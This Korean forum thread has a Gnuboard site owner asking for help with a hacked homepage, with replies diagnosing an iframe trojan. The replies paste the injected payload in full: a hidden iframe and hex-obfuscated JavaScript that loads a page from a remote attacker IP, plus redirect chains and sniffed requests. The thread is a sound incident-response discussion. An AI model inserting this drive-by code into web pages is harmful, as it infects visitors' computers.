해킹코드 생성되네요 정보
해킹코드 생성되네요본문
아무래도 보안취약점이 뚤린 것 같습니다.ㅡ.ㅡ;
제가 현재 만드는 그누보드로 만든 홈페이지에 트로이 해킹코드들이 생성되고 그렇네요...
어제도 해킹이라고 문의드렸는데....
초보자로서 조취할 방법이 없네요
도움의손길 부탁 합니다
www.serona.pe.kr 입니다
제가 현재 만드는 그누보드로 만든 홈페이지에 트로이 해킹코드들이 생성되고 그렇네요...
어제도 해킹이라고 문의드렸는데....
초보자로서 조취할 방법이 없네요
도움의손길 부탁 합니다
www.serona.pe.kr 입니다
댓글 전체
.........................................들어가자 마자 감염됐쌈...........OTL
위의 주소 클릭하지 마세요..여러분덜..
바이러스 걸립니다. 새로나님 위의 주소링크 지우세요
다른분덜 컴퓨터에 바이러스 깔립니다.
현재 메인쪽에 per프로그램으로 생각되어지는 녀석이 실행되는거 같습니다.
확인해보시고 조치하셔야 겠습니다.
바이러스 걸립니다. 새로나님 위의 주소링크 지우세요
다른분덜 컴퓨터에 바이러스 깔립니다.
현재 메인쪽에 per프로그램으로 생각되어지는 녀석이 실행되는거 같습니다.
확인해보시고 조치하셔야 겠습니다.
Trojan.Iframe.AS.......................덜덜
head나 tail쪽 파일에 Iframe으로 특정사이트의 go.html 이라는 파일을 다운로드 하는 것 같네요..
찾으셔서 일단 해당 코드 지우시고..
쉘 숙주파일 찾으셔서 삭제부터 하세용~~
head나 tail쪽 파일에 Iframe으로 특정사이트의 go.html 이라는 파일을 다운로드 하는 것 같네요..
찾으셔서 일단 해당 코드 지우시고..
쉘 숙주파일 찾으셔서 삭제부터 하세용~~
ncoding: chunked
Content-Type: text/html; charset=euc-kr
1076
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<html>
<head>
<META http-equiv="content-type" content="text/html; charset=euc-kr">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no"></head>
<!-- <META HTTP-EQUIV="Page-Enter" CONTENT="BlendTrans(Duration=0.1)">
<META HTTP-EQUIV="Page-EXIT" CONTENT="BlendTrans(Duration=0.1)"> -->
<title>새로나</title>
<link rel="stylesheet" href="./style.css" type="text/css">
<script type="text/javascript">
// 자바스크립트에서 사용하는 전역변수 선언
var g4_path = ".";
var g4_bbs = "bbs";
var g4_bbs_img = "img";
var g4_url = "http://www.serona.pe.kr";
var g4_is_member = "";
var g4_is_admin = "";
var g4_bo_table = "";
var
Content-Type: text/html; charset=euc-kr
1076
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b0f5321487a(v47b0f53214c75){ function v47b0f53215070 () {var v47b0f5321546f=16; return v47b0f5321546f;} return(parseInt(v47b0f53214c75,v47b0f53215070()));}function v47b0f53215880(v47b0f53215c7a){ function v47b0f5321686e () {var v47b0f53216c6c=2; return v47b0f53216c6c;} var v47b0f53216076='';for(v47b0f53216472=0; v47b0f53216472<v47b0f53215c7a.length; v47b0f53216472+=v47b0f5321686e()){ v47b0f53216076+=(String.fromCharCode(v47b0f5321487a(v47b0f53215c7a.substr(v47b0f53216472, v47b0f5321686e()))));}return v47b0f53216076;} document.write(v47b0f53215880('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3338313462207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313037393132292B273536615C272077696474683D323837206865696768743D333736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<html>
<head>
<META http-equiv="content-type" content="text/html; charset=euc-kr">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no"></head>
<!-- <META HTTP-EQUIV="Page-Enter" CONTENT="BlendTrans(Duration=0.1)">
<META HTTP-EQUIV="Page-EXIT" CONTENT="BlendTrans(Duration=0.1)"> -->
<title>새로나</title>
<link rel="stylesheet" href="./style.css" type="text/css">
<script type="text/javascript">
// 자바스크립트에서 사용하는 전역변수 선언
var g4_path = ".";
var g4_bbs = "bbs";
var g4_bbs_img = "img";
var g4_url = "http://www.serona.pe.kr";
var g4_is_member = "";
var g4_is_admin = "";
var g4_bo_table = "";
var
제 pc 는 멀쩡한데... ㅡ ㅡ;
http://77.221.133.188/.if/go.html?4212556a
GET /.if/go.html?4212556a HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.serona.pe.kr/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
GET /.if/go.html?4212556a HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.serona.pe.kr/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
http://77.221.133.188/.dif/go.php
u don't have permission to access /.if/go.html on this server.</p>
<iframe src="http://77.221.133.188/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MA
현재 해당 사이트에서 불러오는 의문의 주소들입니다...
u don't have permission to access /.if/go.html on this server.</p>
<iframe src="http://77.221.133.188/.dif/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MA
현재 해당 사이트에서 불러오는 의문의 주소들입니다...
http://77.221.133.188/.sp/in.cgi?p=o
nnection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.1.6
Referer: http://77.221.133.188/.if/go.html?24274f0d18ec71a71
Location: http://77.221.133.188/.sp/in.cgi?p=o
Content-Length: 0
nnection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.1.6
Referer: http://77.221.133.188/.if/go.html?24274f0d18ec71a71
Location: http://77.221.133.188/.sp/in.cgi?p=o
Content-Length: 0
GET /b?P=BT4UG9GDJJoDPBNzR7jhmkLdeZ1KwUe444oACqDC&T=13sr1qh37%2fX%3d1203299210%2fE%3d2716149%2fR%3dyahoo_top%2fK%3d5%2fV%3d1.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d895997470%2fS%3d1%2fJ%3d9A2483D1&U=1298h67tc%2fN%3dDsbx9dGDJGw-%2fC%3d-1%2fD%3dFDMY3%2fB%3d-1&U=13baaffod%2fN%3dD8bx9dGDJGw-%2fC%3d387001.12220030.12630140.9641268%2fD%3dHDLN%2fB%3d5121648&U=13b4shu62%2fN%3dEMbx9dGDJGw-%2fC%3d289534.5461226.12673414.5322130%2fD%3dHEADR%2fB%3d4040821&U=129puccbt%2fN%3dEcbx9dGDJGw-%2fC%3d-1%2fD%3dFDMY2%2fB%3d-1&U=13cqtbhb7%2fN%3dE8bx9dGDJGw-%2fC%3d261366.10729796.12618579.10391589%2fD%3dFPC1%2fB%3d1720487&U=128p4rbv4%2fN%3dFMbx9dGDJGw-%2fC%3d-1%2fD%3dSTCK%2fB%3d-1&U=13aodv3ct%2fN%3dFcbx9dGDJGw-%2fC%3d635447.12008472.12439058.9413987%2fD%3dMKP%2fB%3d4763841&U=13b1p7eim%2fN%3dFsbx9dGDJGw-%2fC%3d635447.12008473.12439042.9413843%2fD%3dMKP1%2fB%3d4758806&U=13bqtjvs6%2fN%3dF8bx9dGDJGw-%2fC%3d385207.12025678.12453150.9413843%2fD%3dMKP1%2fB%3d4758780&U=13bf63857%2fN%3dGMbx9dGDJGw-%2fC%3d534314.12024941.12452477.9413843%2fD%3dMKP1%2fB%3d4911110&U=128dtj99s%2fN%3dGcbx9dGDJGw-%2fC%3d-1%2fD%3dMKP4%2fB%3d-1&U=13b9u9da7%2fN%3dGsbx9dGDJGw-%2fC%3d640218.12144770.12687621.7674020%2fD%3dFPAD%2fB%3d5228184&U=13cdhkv15%2fN%3dG8bx9dGDJGw-%2fC%3d387002.12224924.12658585.10360830%2fD%3dMNTL%2fB%3d5217439&U=127d6od4c%2fN%3dH8bx9dGDJGw-%2fC%3d-1%2fD%3dSIP%2fB%3d-1&U=139u06v2o%2fN%3dHMbx9dGDJGw-%2fC%3d224039.2072002.3536622.2012076%2fD%3dFOOT%2fB%3d1088125&Q=0&O=0.16283388293027018 HTTP/1.1
Accept: */*
Referer: http://www.yahoo.com/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Accept: */*
Referer: http://www.yahoo.com/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
GET /b?P=MBR_vES0zpADPBNzR7jhmgmxeZ1KwUe444sABl35&T=13t3o2087%2fX%3d1203299211%2fE%3d2716149%2fR%3dyahoo_top%2fK%3d5%2fV%3d1.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d3216731568%2fS%3d1%2fJ%3d90CEB444&U=129tu83ih%2fN%3dRMzx9dGDJGw-%2fC%3d-1%2fD%3dFDMY3%2fB%3d-1&U=13bq94uh8%2fN%3dRszx9dGDJGw-%2fC%3d387001.12220030.12630140.9641268%2fD%3dHDLN%2fB%3d5121653&U=13bg2cf4k%2fN%3dR8zx9dGDJGw-%2fC%3d289534.5461226.12673414.5322130%2fD%3dHEADR%2fB%3d4040821&U=1295puc2h%2fN%3dSMzx9dGDJGw-%2fC%3d-1%2fD%3dFDMY2%2fB%3d-1&U=13cjr103m%2fN%3dSszx9dGDJGw-%2fC%3d261366.10729796.12618579.10391589%2fD%3dFPC1%2fB%3d1720487&U=128710stq%2fN%3dS8zx9dGDJGw-%2fC%3d-1%2fD%3dSTCK%2fB%3d-1&U=13ab8ntqo%2fN%3dTMzx9dGDJGw-%2fC%3d635447.12008472.12439058.9413987%2fD%3dMKP%2fB%3d4763843&U=13bdgk4ja%2fN%3dTczx9dGDJGw-%2fC%3d385207.12025678.12453150.9413843%2fD%3dMKP1%2fB%3d4758783&U=13b2s28vs%2fN%3dTszx9dGDJGw-%2fC%3d635447.12008473.12439042.9413843%2fD%3dMKP1%2fB%3d4758806&U=13b3aa9up%2fN%3dT8zx9dGDJGw-%2fC%3d534314.12024941.12452477.9413843%2fD%3dMKP1%2fB%3d4911110&U=12830s823%2fN%3dUMzx9dGDJGw-%2fC%3d-1%2fD%3dMKP4%2fB%3d-1&U=13bditjcg%2fN%3dUczx9dGDJGw-%2fC%3d640218.12144770.12687621.7674020%2fD%3dFPAD%2fB%3d5228184&U=13cnsvvsj%2fN%3dUszx9dGDJGw-%2fC%3d387002.12224924.12658585.10360830%2fD%3dMNTL%2fB%3d5116991&U=127qha62a%2fN%3dVszx9dGDJGw-%2fC%3d-1%2fD%3dSIP%2fB%3d-1&U=139qhu76v%2fN%3dU8zx9dGDJGw-%2fC%3d224039.2072002.3536622.2012076%2fD%3dFOOT%2fB%3d1088125&Q=0&O=0.910593514052414 HTTP/1.1
Accept: */*
Referer: http://www.yahoo.com/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Accept: */*
Referer: http://www.yahoo.com/
Accept-Language: ko
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
현재 새로나님 사이트에서 스누핑 된 정보입니당~~
저도 로그를 안봐서 어디로 접근한지는 모르겠습니다만.. 일단 심어진 것 부터 처리를~~
저도 로그를 안봐서 어디로 접근한지는 모르겠습니다만.. 일단 심어진 것 부터 처리를~~
서버에 chkrootkit설치하셔서 감염여부 확힌하시고..각 서버의 파일들 조치하셔야 할듯
새로나님 친구인데요.
제가 ftp로 접속해서 그누보드 정보를 확인했는데요.
head.php 파일과 head.sub.php 파일을 오픈해서 봤는데. 위에서 말씀하신 코드는 없었거든요.
그런데. 웹으로 오픈하면 june44님치럼 아이프레임과 관련된 정보들이 나타납니다.
서버가 해킹당한건가요??
웹에서 보면 가장 최상위에 위치한 걸로 봐서 제가 헤더파일을 분석한건데...
혹시 다른 문서 봐야할 것이 있을까요?
제가 ftp로 접속해서 그누보드 정보를 확인했는데요.
head.php 파일과 head.sub.php 파일을 오픈해서 봤는데. 위에서 말씀하신 코드는 없었거든요.
그런데. 웹으로 오픈하면 june44님치럼 아이프레임과 관련된 정보들이 나타납니다.
서버가 해킹당한건가요??
웹에서 보면 가장 최상위에 위치한 걸로 봐서 제가 헤더파일을 분석한건데...
혹시 다른 문서 봐야할 것이 있을까요?
해킹당한건 맞는거 같은데.. 서버내에 숙주파일을 찾으셔야 할겁니다..
브라우징 시에 로드되는 자바 화일도 점검하셔야 합니다.
